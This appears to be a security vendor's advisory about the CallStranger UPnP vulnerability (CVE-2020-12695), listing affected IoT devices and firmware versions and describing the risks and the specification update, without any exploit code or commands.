A new critical vulnerability has been detected. It interferes in the UPnP (Universal Plug and Play) protocol directly affecting the majority of Internet of Things (IoT) devices.
Risks
- Remote code execution
- Data exfiltration
- Involuntary participation in a DDoS attack
Affected Systems
List of systems being updated whose vulnerability is confirmed:
- Windows 10 – upnphost.dll 10.0.18362.719
- Xbox One – OS Version 10.0.19041.2494
- ADB TNR-5720SX Box (TNR-5720SX/v16.4-rc-371-gf5e2289 UPnP/1.0 BH-upnpdev/2.0)
- ASUS Media Streamer
- ASUS Rt-N11
- Belkin WeMo
- Broadcom ADSL Modems
- Canon SELPHY CP1200 Printer
- Cisco X1000 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
- Cisco X3500 – (LINUX/2.4 UPnP/1.0 BRCM400/1.0)
- D-Link DVG-N5412SP WPS Router (OS 1.0 UPnP/1.0 Realtek/V1.3)
- Epson EP, EW, XP Series (EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0)
- HP Deskjet, Photosmart, Officejet ENVY Series (POSIX, UPnP/1.0, Intel MicroStack/1.0.1347)
- Huawei HG255s Router – Firmware HG255sC163B03 (ATP UPnP Core)
- NEC Access Technica WR8165N Router (OS 1.0 UPnP/1.0 Realtek/V1.3)
- Philips 2k14MTK TV – Firmware TPL161E_012.003.039.001
- Samsung UE55MU7000 TV – Firmware T-KTMDEUC-1280.5, BT – S
- Samsung MU8000 TV
- TP-Link TL-WA801ND (Linux/2.6.36, UPnP/1.0, Portable SDK for UPnP devices/1.6.19)
- TRENDnet TV-IP551W (OS 1.0 UPnP/1.0 Realtek/V1.3)
- Zyxel VMG8324-B10A (LINUX/2.6 UPnP/1.0 BRCM400-UPnP/1.0)
Abstract
A vulnerability named CallStranger and numbered CVE-2020-12695 was discovered and privately reported in late 2019 to the Open Connectivity Foundation (#OCF) by the security researcher named Yunus Çadırcı [1].
Many devices are vulnerable, by their direct connection to the Internet, or by their implementation in DMZ and/or via port forwarding mechanisms (#PAT) exhibitors to the Internet.
There is a high probability of exploiting this exposed equipment in order to set up distributed denial of service attacks #DDoS.
In addition, this vulnerability can allow:
- discover the network services of a local network (via a port scan overcoming perimeter network protections);
- to infiltrate data, even if the flows leaving the local network are filtered, by equipment (such as proxy servers or devices for protecting sensitive information #DLP).
OCF updated the standard’ specifications on April 17, 2020 and warned most of the concerned sellers that the update should be incorporated into their products. As this vulnerability affects a protocol and a multitude of peripherals, it is very likely that many devices will remain in production for a long time without benefiting from an update.
TEHTRIS NTA